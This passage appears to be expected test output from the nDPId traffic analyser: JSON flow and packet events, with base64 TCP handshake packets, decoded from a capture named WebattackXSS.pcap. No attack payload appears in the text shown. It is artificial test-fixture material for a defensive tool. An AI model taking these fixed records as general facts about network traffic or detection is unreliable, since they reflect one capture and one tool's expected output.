-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":772,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1499347056333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347056333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GM1AAD4GrQusEAABwKgKMs+gAFAIRCaz0snND4AQAOUMnQAAAQEICgE5Pn4D4w\/0"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347057628,"flow_last_seen":1499347057628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347057628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":785,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1499347057628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347057628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8yDFAAD4G\/Z6sEAABwKgKMs+uAFAuuffwAAAAAKACchAnYQAAAgQFtAQCCAoBOT\/BAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1499347057628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347057628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz662huYkLrn38aAScSB2eQAAAgQFtAQCCAoD4xE4ATk\/wQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":787,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1499347057628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347057628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0yDJAAD4G\/aWsEAABwKgKMs+uAFAuuffxtobmJYAQAOUVgAAAAQEICgE5P8ID4xE4"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347060176,"flow_last_seen":1499347060176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347060176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1499347060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347060176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TeFAAD4Gd++sEAABwKgKMs\/IAFAgqg\/fAAAAAKACchAa6wAAAgQFtAQCCAoBOUI+AAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1499347060176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347060176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz8g7I8+hIKoP4KAScSD5bAAAAgQFtAQCCAoD4xO1ATlCPgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1499347060177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347060177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0TeJAAD4Gd\/asEAABwKgKMs\/IAFAgqg\/gOyPPooAQAOWYcwAAAQEICgE5Qj8D4xO1"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347061452,"flow_last_seen":1499347061452,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347061452,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1499347061452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347061452,"pkt":"ABm5CmnxAMGxFOsxCABFAAA89\/VAAD4GzdqsEAABwKgKMs\/WAFCNxbSIAAAAAKACchAH2QAAAgQFtAQCCAoBOUN9AAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1499347061452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347061452,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz9aoZTRrjcW0iaAScSATEAAAAgQFtAQCCAoD4xT0ATlDfQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1499347061452,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347061452,"pkt":"ABm5CmnxAMGxFOsxCABFAAA09\/ZAAD4GzeGsEAABwKgKMs\/WAFCNxbSJqGU0bIAQAOWyFgAAAQEICgE5Q34D4xT0"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347062740,"flow_last_seen":1499347062740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347062740,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1499347062740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347062740,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/9NAAD4GxfysEAABwKgKMs\/kAFBs1rtsAAAAAKACchAglAAAAgQFtAQCCAoBOUS\/AAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1499347062740,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347062740,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz+TKmKvobNa7baAScSCQ2AAAAgQFtAQCCAoD4xY2ATlEvwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":3,"flow_last_seen":1499347062741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347062741,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/9RAAD4GxgOsEAABwKgKMs\/kAFBs1rttypir6YAQAOUv3wAAAQEICgE5RMAD4xY2"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347065288,"flow_last_seen":1499347065288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347065288,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1499347065288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347065288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t0lAAD4GDoesEAABwKgKMs\/+AFBdePB1AAAAAKACchD4UQAAAgQFtAQCCAoBOUc8AAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1499347065288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347065288,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz\/602CZHXXjwdqAScSABewAAAgQFtAQCCAoD4xizATlHPAEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1499347065288,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347065288,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0t0pAAD4GDo6sEAABwKgKMs\/+AFBdePB2tNgmSIAQAOWggQAAAQEICgE5Rz0D4xiz"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347066560,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347066560,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zkNAAD4G94ysEAABwKgKMtAMAFBP5YY5AAAAAKACchBu1QAAAgQFtAQCCAoBOUh6AAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347066560,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Ax\/i5rPT+WGOqAScSA3hQAAAgQFtAQCCAoD4xnxATlIegEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1499347066560,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347066560,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zkRAAD4G95OsEAABwKgKMtAMAFBP5YY6f4ua0IAQAOXWiwAAAQEICgE5SHsD4xnx"} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1499346935283,"flow_last_seen":1499346941359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7240,"flow_tot_l4_payload_len":15748,"flow_avg_l4_payload_len":524,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935343,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346935650,"flow_last_seen":1499346941289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347068629,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52120,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347069146,"flow_last_seen":1499347069146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347069146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1499347069146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347069146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8xkJAAD4G\/42sEAABwKgKMtAmAFBk4I1DAAAAAKACchBQLwAAAgQFtAQCCAoBOUsBAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1499347069146,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347069146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0CYp21tPZOCNRKAScSCriAAAAgQFtAQCCAoD4xx4ATlLAQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1499347069147,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347069147,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0xkNAAD4G\/5SsEAABwKgKMtAmAFBk4I1EKdtbUIAQAOVKkAAAAQEICgE5SwED4xx4"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347070422,"flow_last_seen":1499347070422,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347070422,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1499347070422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347070422,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83flAAD4G59asEAABwKgKMtA0AFCnyZG5AAAAAKACchAHgwAAAgQFtAQCCAoBOUxAAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":2,"flow_last_seen":1499347070422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347070422,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0DQuPoKZp8mRuqAScSA18AAAAgQFtAQCCAoD4x23ATlMQAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":1499347070423,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347070423,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03fpAAD4G592sEAABwKgKMtA0AFCnyZG6Lj6CmoAQAOXU9wAAAQEICgE5TEAD4x23"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347071685,"flow_last_seen":1499347071685,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347071685,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1499347071685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347071685,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gQZAAD4GRMqsEAABwKgKMtBCAFDUJMx6AAAAAKACchCfHAAAAgQFtAQCCAoBOU18AAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":2,"flow_last_seen":1499347071686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347071686,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0EJ9MmhQ1CTMe6AScSCXogAAAgQFtAQCCAoD4x7zATlNfAEDAwc="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1499347071686,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347071686,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gQdAAD4GRNGsEAABwKgKMtBCAFDUJMx7fTJoUYAQAOU2qgAAAQEICgE5TXwD4x7z"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347074268,"flow_last_seen":1499347074268,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347074268,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":914,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1499347074268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347074268,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NBxAAD4GkbSsEAABwKgKMtBcAFD4fmQdAAAAAKACchDggAAAAgQFtAQCCAoBOVABAAAAAAEDAwc="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":915,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1499347074268,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347074268,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0Fw80cpV+H5kHqAScSC03QAAAgQFtAQCCAoD4yF4ATlQAQEDAwc="} 